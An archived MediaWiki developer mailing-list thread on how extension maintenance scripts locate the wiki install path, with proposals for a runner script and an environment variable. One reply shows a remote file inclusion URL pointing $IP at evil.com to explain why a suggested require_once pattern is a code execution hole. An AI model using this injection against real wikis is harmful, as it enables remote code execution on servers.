If that path doesn't exist, the sysadmin can create it. Scripts that rely on the working directory being $IP or whatever are really annoying.
-- Tim Starling
"Tim Starling" tstarling@wikimedia.org wrote in message news:fung8v$bon$1@ger.gmane.org...
Andrew Garrett wrote:
On Wed, Apr 23, 2008 at 9:40 PM, Mark Clements gmane@kennel17.co.uk wrote:
From an extension writer's point of view, the current situation is to put in a relative require_once() line to commandLine.inc and hope that the file is in the expected place.
global $IP; require_once( "$IP/maintenance/commandLine.inc" );
What am I missing?
Besides not working, that would be an arbitrary remote code execution vulnerability:
http://example.com/w/extensions/TheExtension/updateExtension.php?IP=http://evil.com
$IP is not defined at the point that the script is run. $IP is defined by including commandLine.inc, so you're getting into a bit of a circular scenario there... :-)
A better way to do it is:
require( dirname(__FILE__).'/../../maintenance/commandLine.inc' );
If that path doesn't exist, the sysadmin can create it. Scripts that rely on the working directory being $IP or whatever are really annoying.
That is the current method, which causes problems as detailed in my previous post. To expand on your point, scripts that rely on the extension being in the extensions folder are also annoying.
We provide MediaWiki to our clients via a symlink in their web folder. They have an 'extensions' folder in their home directory where they can add their own extensions (the MW extensions folder is also used for the MW extensions we have enabled globally and which we offer support for). Currently there is no easy way for them to run the maintenance scripts for the extensions they have locally installed without hacking the code to fix the paths.
- Mark Clements (HappyDog)
"Simetrical" Simetrical+wikilist@gmail.com wrote in message news:7c2a12e20804221716xaa6f5cflf216ff28c6324015@mail.gmail.com...
On Tue, Apr 22, 2008 at 5:59 PM, Mark Clements wrote:
And, of course, it doesn't help when that's not the case, which is the situation for us. For technical reasons, all extensions are outside the MW source folder entirely.
Symlinks work perfectly in that case (as is true for my localhost, for instance, since it's running a checked-out version of mediawiki/trunk/). I agree it's not great practice, though: maybe you could try to use the current working directory? That seems even less reliable.
I imagine an 'updateExtension' script in the 'maintenance' folder that include()s the appropriate command line/site settings/etc. files then looks for a script with the appropriate name (based on the extension name which is supplied as first arg on command line - 'ExtName' in this example) in the following places.
*/extensions/ExtName/maintenance.php
*/ExtName/maintenance.php
Where * means anywhere in the include path. If the file exists, run it with the remaining arguments passed through, for which there should be a standardised subset that most extensions use (e.g. 'install' and 'upgrade') though extension-specific items are allowed. If no arg (or an unexpected arg) is provided then the extension file is expected to print out the details about available items (i.e. equivalent to 'help').
- Mark Clements (HappyDog)
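The lookup described above could be sketched roughly as follows, in Python rather than PHP so that it runs standalone. `find_extension_script` is a hypothetical helper, `include_path` is a plain list of directories standing in for PHP's include path, and the order in which candidates are tried (both layouts per directory, directories in order) is an assumption the proposal does not spell out.

```python
import os


def find_extension_script(ext_name, include_path):
    """Return the first existing maintenance.php for ext_name, or None.

    include_path is an ordered list of directories; for each one the two
    layouts from the proposal are tried:
      <dir>/extensions/<ExtName>/maintenance.php
      <dir>/<ExtName>/maintenance.php
    """
    candidates = (
        os.path.join("extensions", ext_name, "maintenance.php"),
        os.path.join(ext_name, "maintenance.php"),
    )
    for base in include_path:
        for relative in candidates:
            full = os.path.join(base, relative)
            if os.path.isfile(full):
                return full
    return None
```

A runner would then pass the remaining command-line arguments (for example 'install' or 'upgrade') to the script it found, and print a usage message when the function returns None.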
What would you think if I created a runMaintenance.php script in the /maintenance folder which could be used to call maintenance scripts? I'll write this from my perspective: I run maintenance scripts inside the path that a wiki is installed into, because that directory is the real location of the wiki; the actual maintenance and similar directories are all symlinks to a central location:
php ./maintenance/runMaintenance.php --root=$PWD ./maintenance/scriptname.php args...
And similarly for extensions:
php ./maintenance/runMaintenance.php --root=$PWD ./extension/ExtName/maintenance/scriptname.php args...
The point is:
* The script checks for the cli sapi type, aborting if it fails.
* The script defines MEDIAWIKI_CLI.
* The script sets $IP to either a --root= param you give it (must be specified before the maintenance script name), or to a default realpath( __FILE__ . '/..' ); which is compatible with default installations while allowing non-defaults to work.
* The script considers the first non-param argument you give it to be a maintenance script name. It then strips out the script name and all arguments before it (considered to be arguments to the runscript).
* The script then includes the maintenance script to be run into itself.
* The maintenance script itself uses an $IP path only if MEDIAWIKI_CLI is defined. Otherwise, for backwards compatibility but more security, it uses require_once( dirname(__FILE__) . "/commandLine.inc" ); Extension scripts would use the ../.. trick they normally use.
So basically the form goes:
php [path to maintenance]runMaintenance.php [args to runscript] <maintenance script name> [args to maintenance script]
And it maintains a fair bit of security while still being lenient on those with non-standard paths who don't want to duplicate things everywhere. You can even run extension maintenance scripts from their extensions folder, or symlink them to the maintenance folder and they'll still work.
~Daniel Friesen(Dantman) of: -The Gaiapedia (http://gaia.wikia.com) -Wikia ACG on Wikia.com (http://wikia.com/wiki/Wikia_ACG) -and Wiki-Tools.com (http://wiki-tools.com)
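The argument handling proposed for runMaintenance.php might look roughly like this. It is a Python sketch of the splitting logic only, assuming POSIX-style paths; `split_runner_args` is a hypothetical name, the default root is taken to be the parent of the directory holding the runner, and the cli sapi check and the MEDIAWIKI_CLI constant are not modelled.

```python
import os


def split_runner_args(argv, runner_path):
    """Split argv (without the runner's own name) into (root, script, args).

    Options before the first non-option argument belong to the runner;
    that first non-option argument is the maintenance script to run, and
    everything after it is passed through to the script untouched.
    """
    root = None
    for index, arg in enumerate(argv):
        if arg.startswith("--root="):
            root = arg[len("--root="):]
        elif arg.startswith("--"):
            continue  # other runner options are ignored in this sketch
        else:
            if root is None:
                # Default install path: one level above the runner's folder.
                runner_dir = os.path.dirname(os.path.abspath(runner_path))
                root = os.path.dirname(runner_dir)
            return root, arg, argv[index + 1:]
    raise SystemExit(
        "usage: runMaintenance.php [--root=DIR] <script> [script args...]")
```

Because the runner stops interpreting options at the script name, a script argument that happens to start with `--root=` is passed through rather than changing the install path.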
Wikitech-l mailing list Wikitech-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikitech-l
Ok, Tim Starling's solution is to use an environment variable and check for it using getenv.
So for example, this is what you would do to an extension script to make it work right: http://svn.wikimedia.org/viewvc/mediawiki/trunk/extensions/CheckUser/install...
I recommend that the fallback used when the environment variable is not set be whatever path logic the maintenance script already had before you modified it. That is best for backwards compatibility.
~Daniel Friesen(Dantman) of: -The Gaiapedia (http://gaia.wikia.com) -Wikia ACG on Wikia.com (http://wikia.com/wiki/Wikia_ACG) -and Wiki-Tools.com (http://wiki-tools.com)
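The environment-variable approach with a backwards-compatible fallback could be sketched as below, again in Python rather than PHP. The thread does not name the variable, so `MW_INSTALL_PATH` is an assumed name, and `resolve_install_path` is a hypothetical helper; the fallback is the "../.." relative path that extension scripts already use.

```python
import os


def resolve_install_path(script_file, environ=None,
                         var_name="MW_INSTALL_PATH"):
    """Pick the wiki root: environment variable first, relative path second.

    var_name is an assumed variable name. An environment variable cannot be
    set through a URL query string, unlike a bare global such as $IP.
    """
    environ = os.environ if environ is None else environ
    from_env = environ.get(var_name)
    if from_env:
        return from_env
    # Fallback keeps the old behaviour: two levels above the script's folder.
    script_dir = os.path.dirname(os.path.abspath(script_file))
    return os.path.normpath(os.path.join(script_dir, "..", ".."))
```

A sysadmin with extensions outside the source tree would export the variable before running the script; everyone else gets the same path as before.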